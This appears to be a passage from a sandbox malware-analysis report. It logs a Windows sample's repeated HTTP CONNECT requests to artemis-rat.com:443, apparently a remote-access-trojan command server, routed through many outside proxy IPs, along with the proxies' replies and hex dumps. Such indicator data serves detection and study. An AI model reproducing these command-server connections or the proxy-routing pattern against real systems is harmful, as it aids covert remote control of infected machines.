                                              275192.168.2.44996723.161.96.132807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.142847061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.192728996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.292172909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366720915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:42.366492033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:54.381838083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:06.523629904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:30.524285078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              276192.168.2.450896172.67.182.169807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.145364046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.299808025 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              277192.168.2.45090323.225.72.12535037284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.152766943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.584955931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.069345951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.022455931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.035598993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.144748926 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              278192.168.2.45085772.195.34.35273607284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.153990984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              279192.168.2.450912104.23.100.73807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.155016899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.310142040 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              280192.168.2.45076292.255.164.16641457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.199655056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              281192.168.2.450753171.250.221.19110807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.200373888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              282192.168.2.45093364.202.186.2328847284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.204771996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.647593021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.147447109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.131808043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.257169008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.366780996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.366498947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.257222891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.054176092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              283192.168.2.45082365.109.152.8888887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.205770969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.529573917 CET236INHTTP/1.1 503 Service Unavailable
                                              Content-Type: text/plain; charset=utf-8
                                              X-Content-Type-Options: nosniff
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Length: 69
                                              Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 32 37 2e 30 2e 30 2e 31 3a 35 33 3a 20 73 65 72 76 65 72 20 6d 69 73 62 65 68 61 76 69 6e 67 0a
                                              Data Ascii: dial tcp: lookup artemis-rat.com on 127.0.0.1:53: server misbehaving


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              284192.168.2.450825223.19.111.185807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.206207991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.881807089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.866220951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.867233038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.866635084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.866565943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.866437912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.584068060 CET340INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.2
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              285192.168.2.449966184.181.217.20141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.206393957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              286192.168.2.450766103.127.1.130807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.206491947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              287192.168.2.450844220.248.70.23790027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.206491947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.533889055 CET311INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              288192.168.2.45092752.13.248.2931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.206655979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.398075104 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              289192.168.2.450833103.171.149.6080807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.206744909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.562427044 CET19INHTTP/1.1 200 OK
                                              Mar 11, 2024 08:37:18.562437057 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              290192.168.2.449900176.197.219.7410807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.206758022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              291192.168.2.45084731.148.207.153807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.206897974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.539448023 CET340INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.2
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              292192.168.2.450818221.6.139.19090027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.206962109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.560286999 CET311INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              293192.168.2.450815109.69.0.17956787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.206964016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              294192.168.2.450875136.243.82.12110827284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.224587917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.579247952 CET84INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Transfer-Encoding: chunked


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              295192.168.2.450805139.99.148.9031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.224776983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.077879906 CET536INHTTP/1.1 407 Proxy Authentication Required
                                              Server: squid/3.5.20
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3711
                                              X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Proxy-Authenticate: Basic realm="Squid Basic Authentication"
